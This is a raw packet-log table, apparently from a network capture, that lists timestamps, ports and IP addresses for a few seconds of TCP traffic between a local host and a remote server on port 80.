Oct 30, 2024 19:47:02.064213991 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.333699942 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.339489937 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.568988085 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569039106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569076061 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569101095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569160938 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569160938 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569191933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569226980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569252014 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569262981 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569283962 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569298029 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569325924 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569334030 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569370031 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569391966 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569510937 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569545031 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.569569111 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.569588900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.570236921 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.570274115 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.570307970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.570312023 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.570353031 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.570384979 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.685888052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.685937881 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.685976028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686022997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686083078 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686135054 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686177969 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686182976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686213970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686248064 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686264038 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686264992 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686264992 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686285973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686295986 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686342955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.686913967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.686983109 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.687057018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.687119007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.687346935 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.687412977 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802388906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802463055 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802472115 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802510023 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802517891 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802552938 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802563906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802598000 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802607059 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802634001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.802642107 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802680016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.802999973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.803050041 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.803076982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.803123951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.803133011 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.803175926 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.803186893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.803231955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.803675890 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.803725004 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.804003954 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.804034948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.804055929 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.804066896 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.804070950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.804105997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.804112911 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.804141045 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.804150105 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.804188013 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.919635057 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.919714928 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.919754028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.919790983 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.919825077 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.919825077 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.919907093 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920028925 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920085907 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920098066 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920123100 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920151949 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920191050 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920202971 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920238018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920269966 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920274019 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920288086 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920326948 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920769930 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920826912 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920830965 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920864105 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920886993 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920898914 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.920924902 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:02.920957088 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.036617994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036634922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036645889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036719084 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036739111 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036750078 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.036895990 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.036936998 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037014961 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.037094116 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037142992 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037154913 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.037213087 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.037219048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037230015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037240028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037276030 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.037306070 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.037359953 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037369967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.037417889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.038181067 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.038191080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.038201094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.038249969 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.038249969 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153321981 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153357983 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153404951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153490067 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153520107 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153565884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153642893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153655052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153700113 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153790951 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153803110 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153814077 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.153847933 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.153881073 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.154604912 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.154618025 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.154629946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.154643059 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.154679060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.154679060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.155494928 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.155539036 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.155550957 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.155560970 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.155599117 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.155605078 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.155605078 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.155639887 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270235062 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270307064 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270353079 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270397902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270406008 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270453930 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270454884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270488977 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270498991 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270524025 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270544052 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270566940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.270608902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.270669937 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271037102 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271090984 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271112919 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271147013 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271164894 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271187067 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271204948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271239996 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271265030 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271303892 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271691084 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271725893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271770000 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271770000 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271780014 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271816015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271822929 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271851063 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.271857977 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.271898985 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.387764931 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.387851000 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.387903929 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.387923002 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.387933016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.387939930 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.387959003 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388055086 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388091087 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388144016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388164043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388200045 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388216972 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388236046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388257027 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388293028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388603926 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388658047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388664007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388694048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388708115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388747931 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388782024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388818979 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388834953 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388854980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.388870001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.388906956 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504277945 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504313946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504327059 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504369020 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504405975 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504528046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504539967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504554987 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504565954 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504592896 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504626989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504638910 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504651070 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.504659891 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.504689932 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505305052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505342960 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505374908 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505408049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505470037 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505505085 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505528927 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505544901 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505567074 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505589962 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505608082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505618095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.505641937 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.505655050 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.506246090 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.506257057 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.506268024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.506283045 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.506310940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.621263027 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621278048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621289968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621309042 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621319056 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621330023 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621341944 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621359110 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.621397018 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.621473074 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621484995 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.621505976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.621530056 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622227907 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622263908 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622436047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622445107 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622472048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622481108 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622490883 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622512102 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622525930 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622556925 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622567892 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.622592926 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.622602940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.623075008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.623085022 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.623095989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.623112917 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.623138905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.623161077 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.623198986 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738063097 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738131046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738137960 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738193035 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738207102 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738238096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738245964 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738259077 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738289118 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738317013 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738404989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738425970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738435984 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738446951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738480091 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738480091 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738503933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738516092 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.738548994 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.738574028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739027023 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739053965 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739065886 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739080906 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739109039 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739109039 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739363909 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739375114 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739387989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739408016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739435911 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739435911 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739445925 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739459038 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739497900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739497900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.739957094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739970922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.739983082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.740005016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.740036011 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.740036011 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.781574965 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.781616926 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.781694889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.781830072 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.855361938 CET	80	49730	45.91.200.39	192.168.2.4
